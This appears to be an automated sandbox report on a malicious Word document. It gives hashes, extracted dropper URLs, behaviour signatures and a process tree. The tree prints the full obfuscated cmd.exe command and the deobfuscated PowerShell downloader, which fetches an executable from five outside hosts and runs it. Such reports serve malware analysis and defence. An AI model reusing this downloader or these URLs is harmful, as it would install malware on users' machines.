Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
28-09-2024 11:16
General
-
Target
fc2f8c2012529d406610ec15b3d74951_JaffaCakes118.doc
-
Size
247KB
-
MD5
fc2f8c2012529d406610ec15b3d74951
-
SHA1
50d1301e3226e78c978636243b03b4855d49e734
-
SHA256
eff1add3604705dc01aa6e09ab7d10d749edca568a9c090a759b61190bb10009
-
SHA512
a3f0735f110b479599061b46e0bccd9045118376ed778b53330d6365878f3f54c618c2e3f214077db8b83c0ca2fb7e8c468ad02acbb840fa36d191ac0b4d7c55
-
SSDEEP
3072:a1wmL5TalBC81ijXS4Rt9ui2nNejL/xSu90OoiLuDKZXfwKeljR14:UL5eb54ui2nNkxUOmD+XfwLM
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://koltukasistani.com/MQKx5tquZSaKOS_jjd5iV3ms
exe.dropper
http://karnatakajudo.org/Fr7JEg3XCtx
exe.dropper
http://privateinvestigatorkendall.com/Fo9cwuVLQWUA
exe.dropper
http://pwp7.ir/PiA5CBMYHR_7
exe.dropper
http://leotravels.in/RiuC1MPOP1s
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fc2f8c2012529d406610ec15b3d74951_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set FI=KXYLuU(@ _J:NIk'CsD%P$rad1ZmGH3gy~vqonjh=R\-FV5AQ/cp{l,;x)Bw7Ob9TiSM4fzeE}t0W+.&&for %w in (51;36;59;19;20;5;58;3;13;16;11;33;46;54;25;19;22;19;66;72;66;66;13;61;12;12;47;67;72;11;33;43;68;54;25;19;39;19;64;72;67;20;11;33;43;30;54;25;19;53;53;8;21;74;36;50;59;62;40;15;65;65;22;59;38;15;55;21;36;70;24;37;70;69;40;37;71;59;43;36;62;38;71;50;74;8;12;71;74;78;76;71;62;16;53;65;71;37;74;55;21;39;35;24;51;22;22;53;40;15;39;74;74;51;11;49;49;14;36;53;74;4;14;23;17;65;17;74;23;37;65;78;50;36;27;49;67;48;0;56;46;74;35;4;26;66;23;0;61;66;9;38;38;24;46;65;45;30;27;17;7;39;74;74;51;11;49;49;14;23;22;37;23;74;23;14;23;38;4;24;36;78;36;22;31;49;44;22;60;10;72;31;30;1;16;74;56;7;39;74;74;51;11;49;49;51;22;65;34;23;74;71;65;37;34;71;17;74;65;31;23;74;36;22;14;71;37;24;23;53;53;78;50;36;27;49;44;36;63;50;59;4;45;3;48;76;5;47;7;39;74;74;51;11;49;49;51;59;51;60;78;65;22;49;20;65;47;46;16;58;67;2;29;41;9;60;7;39;74;74;51;11;49;49;53;71;36;74;22;23;34;71;53;17;78;65;37;49;41;65;4;16;25;67;20;61;20;25;17;15;78;66;51;53;65;74;6;15;7;15;57;55;21;65;69;38;62;14;24;40;15;38;50;34;59;24;15;55;21;34;65;14;14;74;34;50;8;40;8;15;68;68;75;15;55;21;35;27;38;50;17;14;38;40;15;24;37;24;53;50;15;55;21;24;62;34;27;51;74;40;21;71;37;34;11;74;71;27;51;77;15;42;15;77;21;34;65;14;14;74;34;50;77;15;78;71;56;71;15;55;69;36;22;71;23;50;39;6;21;36;27;36;50;39;53;59;8;65;37;8;21;39;35;24;51;22;22;53;57;52;74;22;32;52;21;36;70;24;37;70;69;78;18;36;59;37;53;36;23;24;44;65;53;71;6;21;36;27;36;50;39;53;59;54;8;21;24;62;34;27;51;74;57;55;21;36;4;69;65;38;4;40;15;14;17;69;70;62;69;34;15;55;13;69;8;6;6;28;71;74;43;13;74;71;27;8;21;24;62;34;27;51;74;57;78;53;71;37;31;74;39;8;43;31;71;8;68;75;75;75;75;57;8;52;13;37;34;36;14;71;43;13;74;71;27;8;21;24;62;34;27;51;74;55;21;65;23;14;23;65;34;4;40;15;70;39;51;35;51;39;53;15;55;62;22;71;23;14;55;73;73;50;23;74;50;39;52;73;73;21;65;69;65;27;59;40;15;22;70;69;38;36;70;15;55;81)do set an=!an!!FI:~%w,1!&&if %w gtr 80 echo !an:~4!|cmd"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD /V:ON/C"set FI=KXYLuU(@ _J:NIk'CsD%P$rad1ZmGH3gy~vqonjh=R\-FV5AQ/cp{l,;x)Bw7Ob9TiSM4fzeE}t0W+.&&for %w in (51;36;59;19;20;5;58;3;13;16;11;33;46;54;25;19;22;19;66;72;66;66;13;61;12;12;47;67;72;11;33;43;68;54;25;19;39;19;64;72;67;20;11;33;43;30;54;25;19;53;53;8;21;74;36;50;59;62;40;15;65;65;22;59;38;15;55;21;36;70;24;37;70;69;40;37;71;59;43;36;62;38;71;50;74;8;12;71;74;78;76;71;62;16;53;65;71;37;74;55;21;39;35;24;51;22;22;53;40;15;39;74;74;51;11;49;49;14;36;53;74;4;14;23;17;65;17;74;23;37;65;78;50;36;27;49;67;48;0;56;46;74;35;4;26;66;23;0;61;66;9;38;38;24;46;65;45;30;27;17;7;39;74;74;51;11;49;49;14;23;22;37;23;74;23;14;23;38;4;24;36;78;36;22;31;49;44;22;60;10;72;31;30;1;16;74;56;7;39;74;74;51;11;49;49;51;22;65;34;23;74;71;65;37;34;71;17;74;65;31;23;74;36;22;14;71;37;24;23;53;53;78;50;36;27;49;44;36;63;50;59;4;45;3;48;76;5;47;7;39;74;74;51;11;49;49;51;59;51;60;78;65;22;49;20;65;47;46;16;58;67;2;29;41;9;60;7;39;74;74;51;11;49;49;53;71;36;74;22;23;34;71;53;17;78;65;37;49;41;65;4;16;25;67;20;61;20;25;17;15;78;66;51;53;65;74;6;15;7;15;57;55;21;65;69;38;62;14;24;40;15;38;50;34;59;24;15;55;21;34;65;14;14;74;34;50;8;40;8;15;68;68;75;15;55;21;35;27;38;50;17;14;38;40;15;24;37;24;53;50;15;55;21;24;62;34;27;51;74;40;21;71;37;34;11;74;71;27;51;77;15;42;15;77;21;34;65;14;14;74;34;50;77;15;78;71;56;71;15;55;69;36;22;71;23;50;39;6;21;36;27;36;50;39;53;59;8;65;37;8;21;39;35;24;51;22;22;53;57;52;74;22;32;52;21;36;70;24;37;70;69;78;18;36;59;37;53;36;23;24;44;65;53;71;6;21;36;27;36;50;39;53;59;54;8;21;24;62;34;27;51;74;57;55;21;36;4;69;65;38;4;40;15;14;17;69;70;62;69;34;15;55;13;69;8;6;6;28;71;74;43;13;74;71;27;8;21;24;62;34;27;51;74;57;78;53;71;37;31;74;39;8;43;31;71;8;68;75;75;75;75;57;8;52;13;37;34;36;14;71;43;13;74;71;27;8;21;24;62;34;27;51;74;55;21;65;23;14;23;65;34;4;40;15;70;39;51;35;51;39;53;15;55;62;22;71;23;14;55;73;73;50;23;74;50;39;52;73;73;21;65;69;65;27;59;40;15;22;70;69;38;36;70;15;55;81)do set an=!an!!FI:~%w,1!&&if %w gtr 80 echo !an:~4!|cmd"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $tocwb='iirwj';$ozdnzf=new-object Net.WebClient;$hqdprrl='http://koltukasistani.com/MQKx5tquZSaKOS_jjd5iV3ms@http://karnatakajudo.org/Fr7JEg3XCtx@http://privateinvestigatorkendall.com/Fo9cwuVLQWUA@http://pwp7.ir/PiA5CBMYHR_7@http://leotravels.in/RiuC1MPOP1s'.Split('@');$ifjbkd='jcvwd';$vikktvc = '440';$qmjcskj='dndlc';$dbvmpt=$env:temp+'\'+$vikktvc+'.exe';foreach($omochlw in $hqdprrl){try{$ozdnzf.DownloadFile($omochlw, $dbvmpt);$oufiju='ksfzbfv';If ((Get-Item $dbvmpt).length -ge 40000) {Invoke-Item $dbvmpt;$iakaivu='zhpqphl';break;}}catch{}}$ifimw='rzfjoz';"4⤵
-
-
C:\Windows\system32\cmd.execmd4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $tocwb='iirwj';$ozdnzf=new-object Net.WebClient;$hqdprrl='http://koltukasistani.com/MQKx5tquZSaKOS_jjd5iV3ms@http://karnatakajudo.org/Fr7JEg3XCtx@http://privateinvestigatorkendall.com/Fo9cwuVLQWUA@http://pwp7.ir/PiA5CBMYHR_7@http://leotravels.in/RiuC1MPOP1s'.Split('@');$ifjbkd='jcvwd';$vikktvc = '440';$qmjcskj='dndlc';$dbvmpt=$env:temp+'\'+$vikktvc+'.exe';foreach($omochlw in $hqdprrl){try{$ozdnzf.DownloadFile($omochlw, $dbvmpt);$oufiju='ksfzbfv';If ((Get-Item $dbvmpt).length -ge 40000) {Invoke-Item $dbvmpt;$iakaivu='zhpqphl';break;}}catch{}}$ifimw='rzfjoz';5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
136KB